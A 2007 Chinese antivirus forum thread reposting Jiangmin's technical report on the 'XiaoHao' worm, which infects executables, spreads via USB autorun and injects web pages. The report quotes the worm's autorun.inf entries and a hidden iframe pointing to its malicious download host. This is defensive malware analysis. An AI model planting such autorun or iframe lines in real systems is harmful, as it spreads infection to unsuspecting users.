查看: 3568|回复: 13
收起左侧

[江民] 破坏力超“熊猫烧香” 江民发布“小浩”蠕虫技术报告

 关闭 [复制链接]
yinxuchina
发表于 2007-8-14 22:18:17 | 显示全部楼层 |阅读模式
8月14日,江民科技反病毒中心监测到,一种名为“小浩”蠕虫病毒出现在网络上,该病毒和“熊猫烧香”蠕虫病毒类似,可以感染 *.exe可执行程序,可以通过U盘传播,还会感染各种网页脚本程序,插入带毒网址,但是与“熊猫烧香”蠕虫病毒不同的是,被感染后的*.exe文件将遭到破坏且无法恢复!
江民反病毒专家分析该病毒详细技术特征如下:

病毒名称:Worm/XiaoHao.a
中 文 名:小浩蠕虫
病毒类型:蠕虫
危害等级:★★★★
影响平台:Win 9X/ME/NT/2000/XP/2003
病毒运行特征:
Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘跟目录下释放病毒文件:
c:\xiaohao.exe, 402706字节
c:\autorun.inf, 91字节
其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe 的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体,被感染后的文件图标为一个表示有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。
如下图:



由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。
该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。
另外,病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下:
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
这样,该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。
该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件http://xiaohao.yona.biz/***.exe ,该文件为病毒体自身。
该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。
该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:\Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。
据悉,该病毒作者还将病毒源代码公开在互联网中,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我  或者是交流” ,具有明显的技术炫耀性。

针对此病毒,江民科技已经紧急升级了病毒库,只要升级到8月14日的病毒库,即可拦截此病毒的入侵。
红心王子
发表于 2007-8-15 05:39:02 | 显示全部楼层
感谢yinxuchina的分享
woai_jolin
发表于 2007-8-15 08:59:23 | 显示全部楼层
svs应该可以抵住吧
听雨醉
发表于 2007-8-15 09:07:26 | 显示全部楼层
看来是个菜鸟病毒,专业或职业病毒作者不会炫耀。即使炫耀也不会如此显摆~
微点卫士
发表于 2007-8-15 09:20:49 | 显示全部楼层
这个样本区出现过的诶,好像都能杀掉
i_Kaspersky
发表于 2007-8-15 11:06:10 | 显示全部楼层
浏览这个帖子 费尔 报告有毒啊

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
红心王子
发表于 2007-8-15 11:11:19 | 显示全部楼层

回复 #6 i_Kaspersky 的帖子

这个好像是费尔的误报,查过了没有毒的
Cypress
发表于 2007-8-15 11:27:18 | 显示全部楼层
可能因为帖子里有autorun.inf字样,瞎猜而已。要是真的这样而误报,费尔也太。。。。。。[:26:]
gho
发表于 2007-8-15 12:36:21 | 显示全部楼层
刚刚中了xiaohao,现在已经恢复系统了
kasper
发表于 2007-8-15 13:18:03 | 显示全部楼层
这个挺强 ~~~~挂好多~~~~~~~~~~~~~~~~····
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-5 05:57 , Processed in 0.126330 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表